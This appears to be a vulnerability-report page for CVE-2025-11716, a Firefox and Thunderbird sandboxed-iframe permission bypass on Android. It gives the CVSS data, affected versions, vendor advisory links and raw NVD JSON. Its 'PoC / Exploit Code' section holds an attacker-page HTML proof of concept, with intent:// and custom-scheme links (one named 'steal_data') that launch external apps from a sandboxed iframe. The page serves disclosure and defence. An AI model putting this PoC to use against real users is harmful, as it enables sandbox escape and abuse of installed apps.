Security Vulnerability Report
CVE-2025-11716 CVSS 6.5 MEDIUM

Published: 2025-10-14 13:15:38
Last Modified: 2026-04-13 15:16:41

Description

Links in a sandboxed iframe could open an external app on Android without the required "allow-" permission. This vulnerability was fixed in Firefox 144 and Thunderbird 144.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - NOT VULNERABLE
Mozilla Firefox < 144 (Android)
Mozilla Thunderbird < 144 (Android)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-11716 PoC: Sandbox iframe permission bypass on Android Firefox/Thunderbird -->
<!-- This PoC demonstrates how a sandboxed iframe can open external apps without proper 'allow-' permissions -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CVE-2025-11716 PoC</title>
</head>
<body>
  <h1>Malicious Page (Attacker Controlled)</h1>
  <p>Click the link below to trigger the vulnerability:</p>

  <!-- The sandboxed iframe contains a link that can open an external Android app -->
  <!-- Without proper 'allow-popups' or 'allow-popups-to-escape-sandbox', this should be blocked -->
  <!-- But due to CVE-2025-11716, the external app launches anyway -->
  <iframe sandbox="allow-scripts" src="malicious_iframe.html"
          style="width: 600px; height: 200px; border: 1px solid red;">
  </iframe>

  <!-- malicious_iframe.html content (loaded in sandboxed iframe): -->
  <!--
  <!DOCTYPE html>
  <html>
  <body>
    <h2>Sandboxed Content</h2>
    <a href="intent://#Intent;scheme=myapp;package=com.example.targetapp;S.browser_fallback_url=https://example.com;end">
      Click here (triggers external app on vulnerable Firefox < 144)
    </a>
    <a href="myapp://action/steal_data?param=value">
      Alternative: Direct custom scheme link
    </a>
  </body>
  </html>
  -->
</body>
</html>

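References

https://bugzilla.mozilla.org/show_bug.cgi?id=1818679 (Issue Tracking, Permissions Required)
https://www.mozilla.org/security/advisories/mfsa2025-81/ (Vendor Advisory)
https://www.mozilla.org/security/advisories/mfsa2025-84/ (Vendor Advisory)
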
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11716", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:37.910", "lastModified": "2026-04-13T15:16:40.740", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Links in a sandboxed iframe could open an external app on Android without the required \"allow-\" permission. This vulnerability was fixed in Firefox 144 and Thunderbird 144."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "DC554AD6-8F3F-4C92-85EA-C204204E9E9D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0", "matchCriteriaId": "F7398846-C620-42AF-86CA-60C09184768A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1818679", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-81/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-84/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}